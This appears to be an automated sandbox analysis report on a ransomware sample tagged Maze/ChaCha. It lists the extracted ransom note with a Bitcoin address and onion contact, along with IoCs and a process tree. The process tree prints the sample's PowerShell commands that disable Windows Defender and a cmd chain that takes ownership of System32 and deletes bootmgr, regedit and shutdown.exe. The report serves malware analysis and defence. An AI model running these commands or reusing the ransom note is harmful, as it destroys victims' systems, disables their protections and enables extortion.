Analysis
-
max time kernel
349s -
max time network
1566s -
platform
windows11_x64 -
resource
win11 -
submitted
27-10-2021 09:06
Static task
static1
Behavioral task
behavioral1
Sample
b53415f6_lcvDB3iF4J.exe
Resource
win7-en-20210920
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
b53415f6_lcvDB3iF4J.exe
Resource
win11
windows11_x64
0 signatures
0 seconds
General
Malware Config
Extracted
Path
C:\DECRYPT-FILES.TXT
Ransom Note
Ooops! All your important files are encrypted!
[+] What happend to my computer? [+]
All your important files are encrypted. No one can help you to restore files without our special decryptor.
Backups were either encrypted or deleted. Shadow copies also removed.
If you want to restore some of your files for free write to email (contact is below)
and attach 2-3 encrypted files. You will receive decrypted samples.
To decrypt other files you have to pay $250.
[+] How do i pay? [+]
Payment is accepted in Bitcoin only.
Please check the current price of Bitcoin and buy some Bitcoins.
And send the correct amount to the address specified at the bottom.
[+] How can i contact? [+]
1.Download Tor browser (https://www.torproject.org/)
2.Create account on mail2tor (http://mail2tor2zyjdctd.onion/)
3.Write email to us ([email protected])
If you can't use tor in your country you can write to us on our temporary email address.
[+] What if i already paid? [+]
Send your Bitcoin wallet ID to e-mail provided above.
Attention!
1.Do not modify encrypted files.
2.Do not try decrypt your data using third party software.
3.Do not turn off your computer.
Our bitcoin address: bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe
Our temporary e-mail address: [email protected]
URLs
http://mail2tor2zyjdctd.onion/
Signatures
-
Maze
Ransomware family also known as ChaCha.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Disables Task Manager via registry modification
-
Executes dropped EXE 1 IoCs
pid Process 1556 VSSVC.exe -
Possible privilege escalation attempt 5 IoCs
pid Process 4300 icacls.exe 2280 takeown.exe 3360 takeown.exe 4872 icacls.exe 4732 takeown.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VSSVC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VSSVC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b53415f6_lcvDB3iF4J.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b53415f6_lcvDB3iF4J.exe -
Modifies file permissions 1 TTPs 5 IoCs
pid Process 3360 takeown.exe 4872 icacls.exe 4732 takeown.exe 4300 icacls.exe 2280 takeown.exe -
resource yara_rule behavioral2/memory/2876-148-0x0000000000BC0000-0x0000000000BC1000-memory.dmp themida behavioral2/files/0x000300000002b1ac-166.dat themida behavioral2/files/0x000300000002b1ac-165.dat themida behavioral2/memory/1556-187-0x0000000000CA0000-0x0000000000CA1000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA b53415f6_lcvDB3iF4J.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VSSVC.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2876 b53415f6_lcvDB3iF4J.exe 1556 VSSVC.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4228 powershell.exe 3152 powershell.exe 2916 powershell.exe 1616 powershell.exe 1616 powershell.exe 4228 powershell.exe 3152 powershell.exe 2916 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2876 b53415f6_lcvDB3iF4J.exe Token: SeDebugPrivilege 2876 b53415f6_lcvDB3iF4J.exe Token: SeDebugPrivilege 3152 powershell.exe Token: SeDebugPrivilege 2916 powershell.exe Token: SeDebugPrivilege 1616 powershell.exe Token: SeDebugPrivilege 4228 powershell.exe Token: SeIncreaseQuotaPrivilege 2916 powershell.exe Token: SeSecurityPrivilege 2916 powershell.exe Token: SeTakeOwnershipPrivilege 2916 powershell.exe Token: SeLoadDriverPrivilege 2916 powershell.exe Token: SeSystemProfilePrivilege 2916 powershell.exe Token: SeSystemtimePrivilege 2916 powershell.exe Token: SeProfSingleProcessPrivilege 2916 powershell.exe Token: SeIncBasePriorityPrivilege 2916 powershell.exe Token: SeCreatePagefilePrivilege 2916 powershell.exe Token: SeBackupPrivilege 2916 powershell.exe Token: SeRestorePrivilege 2916 powershell.exe Token: SeShutdownPrivilege 2916 powershell.exe Token: SeDebugPrivilege 2916 powershell.exe Token: SeSystemEnvironmentPrivilege 2916 powershell.exe Token: SeRemoteShutdownPrivilege 2916 powershell.exe Token: SeUndockPrivilege 2916 powershell.exe Token: SeManageVolumePrivilege 2916 powershell.exe Token: 33 2916 powershell.exe Token: 34 2916 powershell.exe Token: 35 2916 powershell.exe Token: 36 2916 powershell.exe Token: SeIncreaseQuotaPrivilege 4228 powershell.exe Token: SeSecurityPrivilege 4228 powershell.exe Token: SeTakeOwnershipPrivilege 4228 powershell.exe Token: SeLoadDriverPrivilege 4228 powershell.exe Token: SeSystemProfilePrivilege 4228 powershell.exe Token: SeSystemtimePrivilege 4228 powershell.exe Token: SeProfSingleProcessPrivilege 4228 powershell.exe Token: SeIncBasePriorityPrivilege 4228 powershell.exe Token: SeCreatePagefilePrivilege 4228 powershell.exe Token: SeBackupPrivilege 4228 powershell.exe Token: SeRestorePrivilege 4228 powershell.exe Token: SeShutdownPrivilege 4228 powershell.exe Token: SeDebugPrivilege 4228 powershell.exe Token: SeSystemEnvironmentPrivilege 4228 powershell.exe Token: SeRemoteShutdownPrivilege 4228 powershell.exe Token: SeUndockPrivilege 4228 powershell.exe Token: SeManageVolumePrivilege 4228 powershell.exe Token: 33 4228 powershell.exe Token: 34 4228 powershell.exe Token: 35 4228 powershell.exe Token: 36 4228 powershell.exe Token: SeIncreaseQuotaPrivilege 1616 powershell.exe Token: SeSecurityPrivilege 1616 powershell.exe Token: SeTakeOwnershipPrivilege 1616 powershell.exe Token: SeLoadDriverPrivilege 1616 powershell.exe Token: SeSystemProfilePrivilege 1616 powershell.exe Token: SeSystemtimePrivilege 1616 powershell.exe Token: SeProfSingleProcessPrivilege 1616 powershell.exe Token: SeIncBasePriorityPrivilege 1616 powershell.exe Token: SeCreatePagefilePrivilege 1616 powershell.exe Token: SeBackupPrivilege 1616 powershell.exe Token: SeRestorePrivilege 1616 powershell.exe Token: SeShutdownPrivilege 1616 powershell.exe Token: SeDebugPrivilege 1616 powershell.exe Token: SeSystemEnvironmentPrivilege 1616 powershell.exe Token: SeRemoteShutdownPrivilege 1616 powershell.exe Token: SeUndockPrivilege 1616 powershell.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 2876 wrote to memory of 4228 2876 b53415f6_lcvDB3iF4J.exe 81 PID 2876 wrote to memory of 4228 2876 b53415f6_lcvDB3iF4J.exe 81 PID 2876 wrote to memory of 4228 2876 b53415f6_lcvDB3iF4J.exe 81 PID 2876 wrote to memory of 1616 2876 b53415f6_lcvDB3iF4J.exe 83 PID 2876 wrote to memory of 1616 2876 b53415f6_lcvDB3iF4J.exe 83 PID 2876 wrote to memory of 1616 2876 b53415f6_lcvDB3iF4J.exe 83 PID 2876 wrote to memory of 2916 2876 b53415f6_lcvDB3iF4J.exe 84 PID 2876 wrote to memory of 2916 2876 b53415f6_lcvDB3iF4J.exe 84 PID 2876 wrote to memory of 2916 2876 b53415f6_lcvDB3iF4J.exe 84 PID 2876 wrote to memory of 3152 2876 b53415f6_lcvDB3iF4J.exe 87 PID 2876 wrote to memory of 3152 2876 b53415f6_lcvDB3iF4J.exe 87 PID 2876 wrote to memory of 3152 2876 b53415f6_lcvDB3iF4J.exe 87 PID 2876 wrote to memory of 1556 2876 b53415f6_lcvDB3iF4J.exe 89 PID 2876 wrote to memory of 1556 2876 b53415f6_lcvDB3iF4J.exe 89 PID 2876 wrote to memory of 1556 2876 b53415f6_lcvDB3iF4J.exe 89 PID 1556 wrote to memory of 2064 1556 VSSVC.exe 91 PID 1556 wrote to memory of 2064 1556 VSSVC.exe 91 PID 1556 wrote to memory of 2064 1556 VSSVC.exe 91 PID 2064 wrote to memory of 3360 2064 cmd.exe 93 PID 2064 wrote to memory of 3360 2064 cmd.exe 93 PID 2064 wrote to memory of 3360 2064 cmd.exe 93 PID 2064 wrote to memory of 4872 2064 cmd.exe 94 PID 2064 wrote to memory of 4872 2064 cmd.exe 94 PID 2064 wrote to memory of 4872 2064 cmd.exe 94 PID 2064 wrote to memory of 4732 2064 cmd.exe 95 PID 2064 wrote to memory of 4732 2064 cmd.exe 95 PID 2064 wrote to memory of 4732 2064 cmd.exe 95 PID 2064 wrote to memory of 4300 2064 cmd.exe 96 PID 2064 wrote to memory of 4300 2064 cmd.exe 96 PID 2064 wrote to memory of 4300 2064 cmd.exe 96 PID 2064 wrote to memory of 2280 2064 cmd.exe 97 PID 2064 wrote to memory of 2280 2064 cmd.exe 97 PID 2064 wrote to memory of 2280 2064 cmd.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe"C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe"1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4228
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3152
-
-
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit3⤵
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System324⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3360
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32 /grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\drivers4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4732
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4300
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2280
-
-
-